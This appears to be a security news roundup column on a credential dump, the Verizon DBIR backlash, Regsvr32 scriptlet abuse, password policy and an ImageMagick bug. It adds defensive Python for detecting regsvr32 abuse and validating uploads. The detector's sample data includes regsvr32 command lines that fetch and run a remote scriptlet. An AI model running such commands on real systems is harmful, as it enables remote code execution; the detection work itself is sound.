Hold Security trades social media likes for 272 million usernames and passwords

The headline of the week comes from Reuters. The news agency reported on the discovery of 272 million email addresses and passwords being sold on a Russian forum. The general tone of the story makes it feel as if this is a big data breach, but it isn't – far from it.

In fact, credential collections like this are traded and sold all the time. Not to mention, rippers (scammers who defraud other criminals) generate fake lists regularly. If someone hits a solid score (through phishing or a massive database dump), the criminal isn't going to immediately share their loot. Valid high-value credentials are hoarded. Once they're used up, they're dumped to lower-level scammers and script kiddies for pennies on the dollar.

In the list obtained by Hold Security, only one out of 200 accounts was new, meaning it hadn't been previously leaked or posted publicly. The source of that list offered up 1.17 billion accounts; 272 million of them were unique, and within that set, 42.5 million (about 15%) were new.

So when Reuters is talking about 272 million accounts, what they're really talking about is 42.5 million. With that number, the best bet is that the credentials came from phishing, not a breach at Google or Microsoft.

In the last month, Salted Hash has seen more than 200,000 phished credentials posted to various places as we work on a project for a story set to run during Black Hat. The idea that someone collected millions of them and added them to other dumps isn't far-fetched. The notion that Gmail was breached is.

Verizon faces backlash over recent Data Breach Investigations Report

The DBIR from Verizon recently came out, and this year's report isn't fire; it was set on fire by the very security experts it was created to help. On Thursday, one expert, Dan Guido, wrote a critique of the report stating that organizations following its recommendations will expose themselves to more risk, not less.

The backlash started with a post by Jericho at OSVDB, who trashed the CVE list used to form the Top 10 attacks. Guido's post expands on that and explores other issues, most notably the fact that university research and scanning led to the TLS FREAK vulnerability topping the list of targets in 2015.

"Clearly, no one who understands vulnerabilities was involved in the review process. The DBIR team tossed in some data-science vocab for credibility, and a few distracting jokes, and asked for readers’ trust... Professionals and businesses around the world depend on this report to make important security decisions. It’s up to Verizon to remain the dependable source for our industry."

Casey Smith, a researcher in Colorado, discovered the function and blogged about it. Salted Hash reached out to Microsoft, asking basic questions and seeking advice on how administrators could protect their networks from an attacker using this method. A spokesperson from Microsoft's PR agency said the company declined to comment.

We asked Microsoft about the function Smith uses and why it exists. This was followed by questions about using EMET as a possible layer of protection, requests for documentation of such methods and of any methods that could be used to block the outgoing connections, non-host mitigations, and advice for detecting Regsvr32 abuse or other IOCs.

"I have connected with my most appropriate colleagues, and unfortunately we are unable to accommodate your request at this time. I apologize for any inconvenience this may cause," the spokesperson wrote.
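Since Microsoft offered no detection advice, here is a starting point of our own. This is an added example, not code from the column, from Smith, or from Microsoft. It assumes the invocation pattern Smith published: regsvr32.exe run with /s /n /u and an /i: argument pointing at a scriptlet URL, with scrobj.dll as the DLL, which executes script fetched over HTTP without dropping a binary. The process-creation records below are constructed to resemble Sysmon or 4688 events; they are not real telemetry.

```python
"""Flag regsvr32 invocations that load a COM scriptlet via scrobj.dll."""
import ntpath
import re

# Constructed sample records: (image path, command line). Not real logs.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://192.0.2.10/update.sct scrobj.dll"),
    ("C:\\Windows\\SysWOW64\\regsvr32.exe",
     "regsvr32.exe /S /N /U /I:https://example.net/a.sct ScrObj.dll"),
    ("C:\\Windows\\System32\\regsvr32.exe",
     'regsvr32 /s "C:\\Program Files\\Vendor\\vendor.dll"'),          # benign
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /i:C:\\temp\\local.sct scrobj.dll"),              # dropped file
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c echo hello"),           # not regsvr32
]

# /i:<value>, where <value> may be quoted; case-insensitive (/I: is common).
_INSTALL_ARG = re.compile(r'(?i)(?:^|\s)/i:(?:"([^"]*)"|(\S+))')
# A URL or UNC path means the scriptlet is fetched from somewhere else.
_REMOTE = re.compile(r'(?i)^(?:https?|ftp)://|^\\\\')
# scrobj.dll is the scriptlet host; match it as a separate token or path tail.
_SCROBJ = re.compile(r'(?i)(?:^|[\s"\\/])scrobj\.dll\b')


def classify_regsvr32(image: str, cmdline: str):
    """Return a label for one process-creation record, or None.

    'remote-scriptlet': regsvr32 + scrobj.dll with /i: pointing at a URL/UNC
    'local-scriptlet' : same, but the scriptlet is a local file
    """
    first_token = (cmdline.split() or [""])[0].strip('"')
    exe = ntpath.basename(image or first_token).lower()
    if exe not in ("regsvr32.exe", "regsvr32"):
        return None
    m = _INSTALL_ARG.search(cmdline)
    if not m or not _SCROBJ.search(cmdline):
        return None
    target = m.group(1) if m.group(1) is not None else m.group(2)
    return "remote-scriptlet" if _REMOTE.match(target) else "local-scriptlet"


def scan(events):
    """Run the classifier over (image, cmdline) pairs and keep only the hits."""
    hits = []
    for i, (image, cmd) in enumerate(events):
        label = classify_regsvr32(image, cmd)
        if label:
            hits.append((i, label))
    return hits


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}: {SAMPLE_EVENTS[idx][1]}")
```

Treat this as a high-signal rule, not a complete one: an attacker can copy regsvr32.exe under another name or point /i: at a different COM server, so pair the command-line match with a rule for regsvr32.exe (or any LOLBin) making outbound network connections, which is the behaviour that actually matters here.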

Remembering long passwords is hard enough for some people, but when you have to remember a new one every quarter, that's pushing it a bit. Most people, in order to compensate, will recycle their passwords and use incremental elements, such as adding a number or the year to the end.

"To make the burden of passwords a little easier, we suggest that you stop changing your passwords frequently. Instead you should create a sentence as your password for each service," Thorsheim wrote.

The goal is to create a general mindset that passwords should be changed only when they've been compromised.

Millions of websites are at risk due to a bug in ImageMagick which, if exploited, would allow an attacker to compromise the server hosting them. In addition to affecting ImageMagick compiled along with PHP, the vulnerability affects servers where the library is used from Ruby (rmagick and paperclip) and from Node.js's ImageMagick module.
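The column doesn't cover mitigations, so here is one as an added example; it is not the page's code and not ImageMagick's. The disclosure for this bug recommended that applications verify an upload starts with the magic bytes of the format it claims to be before handing it to ImageMagick, because ImageMagick decides how to parse a file by its content rather than its name, and the bug was reached through its text-based formats. The check below does that for a small whitelist of raster formats; the sample uploads, including the MVG script renamed to .png, are constructed for the example.

```python
"""Accept an upload only if its extension is whitelisted and its bytes agree."""
import os

# Magic bytes for the raster formats an upload form would normally accept.
# .jpg and .jpeg share one signature list on purpose (see is_safe_upload).
MAGIC = {
    ".png":  [b"\x89PNG\r\n\x1a\n"],
    ".jpg":  [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif":  [b"GIF87a", b"GIF89a"],
}

# Constructed sample uploads: name -> first bytes of the file.
SAMPLES = {
    "photo.png":   b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "photo.jpeg":  b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "anim.gif":    b"GIF89a" + b"\x00" * 8,
    # An MVG drawing script given a .png name: the extension check alone
    # would pass it, and ImageMagick would parse it as MVG regardless.
    "exploit.png": b"push graphic-context\nviewbox 0 0 640 480\n",
    # A text format that must never reach ImageMagick from an upload form.
    "vector.svg":  b"<svg xmlns='http://www.w3.org/2000/svg'></svg>",
}


def sniff_format(data: bytes):
    """Return the whitelisted extension whose magic bytes match, or None."""
    for ext, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return None


def is_safe_upload(filename: str, data: bytes) -> bool:
    """True only when the extension is whitelisted AND the content agrees.

    Both halves matter: a .png that starts with 'push graphic-context' fails
    the content check; an .svg or .mvg fails the extension check outright.
    """
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return False
    sniffed = sniff_format(data)
    # Compare signature lists, not extensions, so .jpg content under a
    # .jpeg name (or vice versa) is still accepted.
    return sniffed is not None and MAGIC[sniffed] == MAGIC[ext]


def triage(uploads):
    """Apply the check to a name -> bytes mapping; returns name -> verdict."""
    return {name: is_safe_upload(name, data) for name, data in uploads.items()}


if __name__ == "__main__":
    for name, ok in triage(SAMPLES).items():
        print(f"{name:12s} {'accept' if ok else 'reject'}")
```

This is a gate in front of the library, not a fix for it: patch ImageMagick, and restrict the coders it will use (the disclosure also published a policy.xml to disable the text-based and URL-fetching ones), because any file that passes this check is still parsed by the same code.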

Neat tool: Pentest Box

A reader suggested Pentest Box as a possible Rehashed inclusion. It's a penetration testing platform that runs on Windows. The design is clean, the software itself is simple to use, plus it has most of the basic Linux-based commands and tools that one would need. I'm still playing with it, but so far I like what I see.

Remember, if you come across a blog post or news item next week, or perhaps just something amusing, that you think should be shared on Rehash, feel free to email me a link. General corporate news and product-based items are the only exceptions.